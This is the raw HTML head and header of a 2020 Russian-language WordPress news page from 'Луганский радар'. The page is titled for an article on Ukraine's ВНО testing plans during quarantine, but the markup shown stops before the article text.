<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="ru-RU" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->
<head>
    <title>Когда состоится пробное ВНО и изменят ли тесты из-за карантина: важное заявление</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="http://lugradar.net/xmlrpc.php" />
    <link rel="icon" type="image/png" href="http://lugradar.net/wp-content/uploads/2020/03/favicon.png">
<!-- This site is optimized with the Yoast SEO plugin v10.0 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://lugradar.net/2020/03/208457" />
<meta property="og:locale" content="ru_RU" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Когда состоится пробное ВНО и изменят ли тесты из-за карантина: важное заявление" />
<meta property="og:description" content="В Украине разработали два варианта проведения внешнего независимого оценивания (ВНО) с учетом карантина, при этом вносить коррективы в тесты из-за дистанционного обучения не будут. Об этом в эфире телеканала &#171;1+1&#187; сообщила исполняющая обязанности министра образования Любомира Мандзий. &#171;На сайте Министерства образования опубликованы варианты проведения ВНО. Если у нас к учебе возвращаются в начале мая, то &hellip;" />
<meta property="og:url" content="http://lugradar.net/2020/03/208457" />
<meta property="og:site_name" content="Луганский радар" />
<meta property="article:publisher" content="https://www.facebook.com/lugradar/" />
<meta property="article:section" content="Общество" />
<meta property="article:published_time" content="2020-03-31T13:02:26+03:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="В Украине разработали два варианта проведения внешнего независимого оценивания (ВНО) с учетом карантина, при этом вносить коррективы в тесты из-за дистанционного обучения не будут. Об этом в эфире телеканала &#171;1+1&#187; сообщила исполняющая обязанности министра образования Любомира Мандзий. &#171;На сайте Министерства образования опубликованы варианты проведения ВНО. Если у нас к учебе возвращаются в начале мая, то [&hellip;]" />
<meta name="twitter:title" content="Когда состоится пробное ВНО и изменят ли тесты из-за карантина: важное заявление" />
<meta name="twitter:site" content="@lradar_official" />
<meta name="twitter:creator" content="@lradar_official" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Луганский радар &raquo; Лента" href="http://lugradar.net/feed" />
<link rel="alternate" type="application/rss+xml" title="Луганский радар &raquo; Лента комментариев" href="http://lugradar.net/comments/feed" />
<link rel="alternate" type="application/rss+xml" title="Луганский радар &raquo; Лента комментариев к &laquo;Когда состоится пробное ВНО и изменят ли тесты из-за карантина: важное заявление&raquo;" href="http://lugradar.net/2020/03/208457/feed" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/lugradar.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=2e2302cf56c0f42f1e414c5294cfde3c"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='http://lugradar.net/wp-includes/css/dist/block-library/style.min.css?ver=2e2302cf56c0f42f1e414c5294cfde3c' type='text/css' media='all' />
<link rel='stylesheet' id='wp_automatic_gallery_style-css'  href='http://lugradar.net/wp-content/plugins/wp-automatic/css/wp-automatic.css?ver=1.0.0' type='text/css' media='all' />
<link rel='stylesheet' id='td-plugin-multi-purpose-css'  href='http://lugradar.net/wp-content/plugins/td-composer/td-multi-purpose/style.css?ver=ce02edff9ef904abd63ba7c9020dbb40' type='text/css' media='all' />
<link rel='stylesheet' id='google-fonts-style-css'  href='http://fonts.googleapis.com/css?family=Rubik%3A400%7CLora%3A400%7CRoboto%3A400%2C500%2C700%7COpen+Sans%3A400%2C600%2C700&#038;display=swap&#038;ver=10.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://lugradar.net/wp-content/themes/Newspaper/style.css?ver=10.3.1' type='text/css' media='all' />
<style id='td-theme-inline-css' type='text/css'>
    
        @media (max-width: 767px) {
            .td-header-desktop-wrap {
                display: none;
            }
        }
        @media (min-width: 767px) {
            .td-header-mobile-wrap {
                display: none;
            }
        }
    
	
</style>
<link rel='stylesheet' id='td-legacy-framework-front-style-css'  href='http://lugradar.net/wp-content/plugins/td-composer/legacy/Newspaper/assets/css/td_legacy_main.css?ver=ce02edff9ef904abd63ba7c9020dbb40' type='text/css' media='all' />
<link rel='stylesheet' id='td-standard-pack-framework-front-style-css'  href='http://lugradar.net/wp-content/plugins/td-standard-pack/Newspaper/assets/css/td_standard_pack_main.css?ver=33732733d5ee7fb19a9ddd0e8b73e9d4' type='text/css' media='all' />
<link rel='stylesheet' id='tdb_front_style-css'  href='http://lugradar.net/wp-content/plugins/td-cloud-library/assets/css/tdb_less_front.css?ver=8a1d9913b13d9ab2baf63a2b29cd9fc1' type='text/css' media='all' />
<script type='text/javascript' src='http://lugradar.net/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='http://lugradar.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://lugradar.net/wp-content/plugins/wp-automatic/js/main-front.js?ver=2e2302cf56c0f42f1e414c5294cfde3c'></script>
<link rel='https://api.w.org/' href='http://lugradar.net/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://lugradar.net/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://lugradar.net/wp-includes/wlwmanifest.xml" /> 

<link rel='shortlink' href='http://lugradar.net/?p=208457' />
<link rel="alternate" type="application/json+oembed" href="http://lugradar.net/wp-json/oembed/1.0/embed?url=http%3A%2F%2Flugradar.net%2F2020%2F03%2F208457" />
<link rel="alternate" type="text/xml+oembed" href="http://lugradar.net/wp-json/oembed/1.0/embed?url=http%3A%2F%2Flugradar.net%2F2020%2F03%2F208457&#038;format=xml" />
<script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		if (window.wfLogHumanRan) { return; }
		window.wfLogHumanRan = true;
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//lugradar.net/?wordfence_lh=1&hid=69E8852613C2908D74746F323F487027');
</script><!--[if lt IE 9]><script src="http://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.js"></script><![endif]-->
        <script>
        window.tdb_globals = {"wpRestNonce":"2efae17552","wpRestUrl":"http:\/\/lugradar.net\/wp-json\/","permalinkStructure":"\/%year%\/%monthnum%\/%post_id%","isAjax":false,"isAdminBarShowing":false,"autoloadScrollPercent":50,"postAutoloadStatus":"off","origPostEditUrl":null};
    </script>
    			<script>
				window.tdwGlobal = {"adminUrl":"http:\/\/lugradar.net\/wp-admin\/","wpRestNonce":"2efae17552","wpRestUrl":"http:\/\/lugradar.net\/wp-json\/","permalinkStructure":"\/%year%\/%monthnum%\/%post_id%"};
			</script>
			
<!-- JS generated by theme -->

<script>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</script>


<!-- Header style compiled by theme -->

<style>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</style>


<!-- Button style compiled by theme -->

<style>
    .tdm_block_column_content:hover .tdm-col-content-title-url .tdm-title,
                .tds-button2 .tdm-btn-text,
                .tds-button2 i,
                .tds-button5:hover .tdm-btn-text,
                .tds-button5:hover i,
                .tds-button6 .tdm-btn-text,
                .tds-button6 i,
                .tdm_block_list .tdm-list-item i,
                .tdm_block_pricing .tdm-pricing-feature i,
                .tdm-social-item i {
                    color: #44749d;
                }
                .tds-button1,
                .tds-button6:after,
                .tds-title2 .tdm-title-line:after,
                .tds-title3 .tdm-title-line:after,
                .tdm_block_pricing.tdm-pricing-featured:before,
                .tdm_block_pricing.tds_pricing2_block.tdm-pricing-featured .tdm-pricing-header,
                .tds-progress-bar1 .tdm-progress-bar:after,
                .tds-progress-bar2 .tdm-progress-bar:after,
                .tds-social3 .tdm-social-item {
                    background-color: #44749d;
                }
                .tds-button2:before,
                .tds-button6:before,
                .tds-progress-bar3 .tdm-progress-bar:after {
                  border-color: #44749d;
                }
                .tdm-btn-style1 {
					background-color: #44749d;
				}
				.tdm-btn-style2:before {
				    border-color: #44749d;
				}
				.tdm-btn-style2 {
				    color: #44749d;
				}
				.tdm-btn-style3 {
				    -webkit-box-shadow: 0 2px 16px #44749d;
                    -moz-box-shadow: 0 2px 16px #44749d;
                    box-shadow: 0 2px 16px #44749d;
				}
				.tdm-btn-style3:hover {
				    -webkit-box-shadow: 0 4px 26px #44749d;
                    -moz-box-shadow: 0 4px 26px #44749d;
                    box-shadow: 0 4px 26px #44749d;
				}
</style>

	<style id="tdw-css-placeholder"></style></head>

<body class="post-template-default single single-post postid-208457 single-format-standard td-standard-pack ----- global-block-template-5 single_template_1 td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="http://schema.org/WebPage">

        <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>

    <div class="td-menu-background"></div>
<div id="td-mobile-nav">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-osnova-container"><ul id="menu-osnova" class="td-mobile-main-menu"><li id="menu-item-22104" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first menu-item-22104"><a href="http://lugradar.net/">Главная</a></li>
<li id="menu-item-28" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28"><a href="http://lugradar.net/region/politika">Политика</a></li>
<li id="menu-item-27" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-27"><a href="http://lugradar.net/region/obchestvo">Общество</a></li>
<li id="menu-item-31" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-31"><a href="http://lugradar.net/region/ekonomika">Экономика</a></li>
<li id="menu-item-29" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-29"><a href="http://lugradar.net/region/proishestviya">Происшествия</a></li>
<li id="menu-item-82118" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-82118"><a href="http://lugradar.net/category/%d0%b2%d0%b8%d0%b4%d0%b5%d0%be">Видео</a></li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
            <div id="login-form-mobile" class="td-register-section">
            
            <div id="td-login-mob" class="td-login-animation td-login-hide-mob">
            	<!-- close button -->
	            <div class="td-login-close">
	                <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
	                <div class="td-login-title">Sign in</div>
	                <!-- close button -->
		            <div class="td-mobile-close">
		                <a href="#"><i class="td-icon-close-mobile"></i></a>
		            </div>
	            </div>
	            <div class="td-login-form-wrap">
	                <div class="td-login-panel-title"><span>Welcome!</span>Log into your account</div>
	                <div class="td_display_err"></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="text" name="login_email" id="login_email-mob" value="" required><label>Ваше имя пользователя</label></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="password" name="login_pass" id="login_pass-mob" value="" required><label>Ваш пароль</label></div>
	                <input type="button" name="login_button" id="login_button-mob" class="td-login-button" value="ВОЙТИ">
	                <div class="td-login-info-text">
	                <a href="#" id="forgot-pass-link-mob">Вы забыли свой пароль?</a>
	                </div>
	                <div class="td-login-register-link">
	                
	                </div>
	                
	                

                </div>
            </div>

            
            
            
            
            <div id="td-forgot-pass-mob" class="td-login-animation td-login-hide-mob">
                <!-- close button -->
	            <div class="td-forgot-pass-close">
	                <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
	                <div class="td-login-title">Password recovery</div>
	            </div>
	            <div class="td-login-form-wrap">
	                <div class="td-login-panel-title">Восстановите свой пароль</div>
	                <div class="td_display_err"></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email-mob" value="" required><label>Ваш адрес электронной почты</label></div>
	                <input type="button" name="forgot_button" id="forgot_button-mob" class="td-login-button" value="Отправить Мой Пароль">
                </div>
            </div>
        </div>
    </div>    <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
	<div class="td-drop-down-search">
		<form method="get" class="td-search-form" action="http://lugradar.net/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Поиск</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob" class="td-ajax-search-flex"></div>
	</div>
</div>

    <div id="td-outer-wrap" class="td-theme-wrap">
    
        
            <div class="tdc-header-wrap ">

            <!--
Header style 1
-->


<div class="td-header-wrap td-header-style-1 ">
    
    <div class="td-header-top-menu-full td-container-wrap td_stretch_content">
        <div class="td-container td-header-row td-header-top-menu">
            <!-- LOGIN MODAL -->

                <div  id="login-form" class="white-popup-block mfp-hide mfp-with-anim">
                    <div class="td-login-wrap">
                        <a href="#" class="td-back-button"><i class="td-icon-modal-back"></i></a>
                        <div id="td-login-div" class="td-login-form-div td-display-block">
                            <div class="td-login-panel-title">Sign in</div>
                            <div class="td-login-panel-descr">Добро пожаловать! Войдите в свою учётную запись</div>
                            <div class="td_display_err"></div>
                            <div class="td-login-inputs"><input class="td-login-input" type="text" name="login_email" id="login_email" value="" required><label>Ваше имя пользователя</label></div>
	                        <div class="td-login-inputs"><input class="td-login-input" type="password" name="login_pass" id="login_pass" value="" required><label>Ваш пароль</label></div>
                            <input type="button" name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Login">
                            <div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password? Get help</a></div>
                            
                            
                            
                            
                        </div>

                        

                         <div id="td-forgot-pass-div" class="td-login-form-div td-display-none">
                            <div class="td-login-panel-title">Password recovery</div>
                            <div class="td-login-panel-descr">Восстановите свой пароль</div>
                            <div class="td_display_err"></div>
                            <div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email" value="" required><label>Ваш адрес электронной почты</label></div>
                            <input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Password">
                            <div class="td-login-info-text">Пароль будет выслан Вам по электронной почте.</div>
                        </div>
                        
                        
                    </div>
                </div>
                        </div>
    </div>

    <div class="td-banner-wrap-full td-logo-wrap-full td-container-wrap td_stretch_content">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                        <a class="td-main-logo" href="http://lugradar.net/">
            <img class="td-retina-data" data-retina="http://lugradar.net/wp-content/uploads/2020/03/3.png" src="http://lugradar.net/wp-content/uploads/2020/03/3.png" alt=""/>
            <span class="td-visual-hidden">Луганский радар</span>
        </a>
                </div>
                            <div class="td-header-sp-recs">
                    <div class="td-header-rec-wrap">
    
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-header tdi_1_c4c td_block_template_5 ">

<style>
/* custom css */
.tdi_1_c4c.td-a-rec-img{
				    text-align: left;
				}.tdi_1_c4c.td-a-rec-img img{
                    margin: 0 auto 0 0;
                }
</style><script type="text/javascript">
var td_screen_width = window.innerWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-3597186493885120" data-ad-slot=""></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3597186493885120" data-ad-slot=""></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-3597186493885120" data-ad-slot=""></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:320px;height:50px" data-ad-client="ca-pub-3597186493885120" data-ad-slot=""></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 


</div>                </div>
                    </div>
    </div>

    <div class="td-header-menu-wrap-full td-container-wrap td_stretch_content">
        
        <div class="td-header-menu-wrap td-header-gradient ">
            <div class="td-container td-header-row td-header-main-menu">
                <div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-header">
                <a class="td-main-logo" href="http://lugradar.net/">
            <img class="td-retina-data" data-retina="http://lugradar.net/wp-content/uploads/2020/03/3.png" src="http://lugradar.net/wp-content/uploads/2020/03/3.png" alt=""/>
        </a>
        </div>
    <div class="menu-osnova-container"><ul id="menu-osnova-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-22104"><a href="http://lugradar.net/">Главная</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-28"><a href="http://lugradar.net/region/politika">Политика</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-27"><a href="http://lugradar.net/region/obchestvo">Общество</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-31"><a href="http://lugradar.net/region/ekonomika">Экономика</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-29"><a href="http://lugradar.net/region/proishestviya">Происшествия</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-mega-menu menu-item-82118"><a href="http://lugradar.net/category/%d0%b2%d0%b8%d0%b4%d0%b5%d0%be">Видео</a>
<ul class="sub-menu">
	<li id="menu-item-0" class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu tdi_2_4d7 td-no-subcats td_with_ajax_pagination td-pb-border-top td_block_template_5"  data-td-block-uid="tdi_2_4d7" ><script>var block_tdi_2_4d7 = new tdBlock();
block_tdi_2_4d7.id = "tdi_2_4d7";
block_tdi_2_4d7.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"10086","show_child_cat":30,"td_ajax_filter_type":"td_category_ids_filter","td_ajax_preloading":"","block_template_id":"","header_color":"","ajax_pagination_infinite_stop":"","offset":"","td_filter_default_txt":"","td_ajax_filter_ids":"","el_class":"","color_preset":"","border_top":"","css":"","tdc_css":"","class":"tdi_2_4d7","tdc_css_class":"tdi_2_4d7","tdc_css_class_style":"tdi_2_4d7_rand_style"}';
block_tdi_2_4d7.td_column_number = "3";
block_tdi_2_4d7.block_type = "td_block_mega_menu";
block_tdi_2_4d7.post_count = "5";
block_tdi_2_4d7.found_posts = "292";
block_tdi_2_4d7.header_color = "";
block_tdi_2_4d7.ajax_pagination_infinite_stop = "";
block_tdi_2_4d7.max_num_pages = "59";
tdBlocksArray.push(block_tdi_2_4d7);
</script><div id=tdi_2_4d7 class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu td-animation-stack td-meta-info-hide td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://lugradar.net/2019/12/202373" rel="bookmark" class="td-image-wrap" title="Популярное тревел-шоу &#171;Орел и Решка&#187; сняло передачу о Донбассе"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Популярное тревел-шоу &#171;Орел и Решка&#187; сняло передачу о Донбассе" data-type="image_tag" data-img-url="http://lugradar.net/wp-content/uploads/2019/12/maxresdefault-1-218x150.jpg"  width="218" height="150" /><span class="td-video-play-ico"><i class="td-icon-video-thumb-play"></i></span></a></div>                            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://lugradar.net/2019/12/202373" rel="bookmark" title="Популярное тревел-шоу &#171;Орел и Решка&#187; сняло передачу о Донбассе">Популярное тревел-шоу &#171;Орел и Решка&#187; сняло передачу о Донбассе</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td-animation-stack td-meta-info-hide td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://lugradar.net/2019/09/199504" rel="bookmark" class="td-image-wrap" title="Ремонт моста в Станице Луганской можно увидеть ONLINE"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Ремонт моста в Станице Луганской можно увидеть ONLINE" data-type="image_tag" data-img-url="http://lugradar.net/wp-content/uploads/2019/09/maxresdefault-218x150.jpg"  width="218" height="150" /><span class="td-video-play-ico"><i class="td-icon-video-thumb-play"></i></span></a></div>                            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://lugradar.net/2019/09/199504" rel="bookmark" title="Ремонт моста в Станице Луганской можно увидеть ONLINE">Ремонт моста в Станице Луганской можно увидеть ONLINE</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td-animation-stack td-meta-info-hide td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://lugradar.net/2019/05/196041" rel="bookmark" class="td-image-wrap" title="Зеленский побывал на передовых позициях на Донбассе"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC"alt="" data-type="image_tag" data-img-url="http://lugradar.net/wp-content/plugins/td-composer/legacy/Newspaper/assets/images/no-thumb/td_218x150.png"  width="218" height="150" /><span class="td-video-play-ico"><i class="td-icon-video-thumb-play"></i></span></a></div>                            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://lugradar.net/2019/05/196041" rel="bookmark" title="Зеленский побывал на передовых позициях на Донбассе">Зеленский побывал на передовых позициях на Донбассе</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td-animation-stack td-meta-info-hide td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://lugradar.net/2019/05/195381" rel="bookmark" class="td-image-wrap" title="Как сейчас выглядит железнодорожный вокзал в Луганске"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Как сейчас выглядит железнодорожный вокзал в Луганске" data-type="image_tag" data-img-url="http://lugradar.net/wp-content/uploads/2019/05/sddefault-218x150.jpg"  width="218" height="150" /><span class="td-video-play-ico"><i class="td-icon-video-thumb-play"></i></span></a></div>                            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://lugradar.net/2019/05/195381" rel="bookmark" title="Как сейчас выглядит железнодорожный вокзал в Луганске">Как сейчас выглядит железнодорожный вокзал в Луганске</a></h3>            </div>
        </div>
        </div><div class="td-mega-span">
        <div class="td_module_mega_menu td-animation-stack td-meta-info-hide td_mod_mega_menu">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://lugradar.net/2019/03/193878" rel="bookmark" class="td-image-wrap" title="Появилось видео с места взрыва в оккупированном Луганске"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Появилось видео с места взрыва в оккупированном Луганске" data-type="image_tag" data-img-url="http://lugradar.net/wp-content/uploads/2019/03/maxresdefault-2-218x150.jpg"  width="218" height="150" /><span class="td-video-play-ico"><i class="td-icon-video-thumb-play"></i></span></a></div>                            </div>

            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://lugradar.net/2019/03/193878" rel="bookmark" title="Появилось видео с места взрыва в оккупированном Луганске">Появилось видео с места взрыва в оккупированном Луганске</a></h3>            </div>
        </div>
        </div></div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-tdi_2_4d7" data-td_block_id="tdi_2_4d7"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-tdi_2_4d7" data-td_block_id="tdi_2_4d7"><i class="td-icon-font td-icon-menu-right"></i></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></div></li>
</ul>
</li>
</ul></div></div>


    <div class="header-search-wrap">
        <div class="td-search-btns-wrap">
            <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            <a id="td-header-search-button-mob" href="#" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
        </div>

        <div class="td-drop-down-search" aria-labelledby="td-header-search-button">
            <form method="get" class="td-search-form" action="http://lugradar.net/">
                <div role="search" class="td-head-form-search-wrap">
                    <input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Поиск" />
                </div>
            </form>
            <div id="td-aj-search"></div>
        </div>
    </div>
            </div>
        </div>
    </div>

</div>
            </div>

            
    <div class="td-main-content-wrap td-container-wrap">

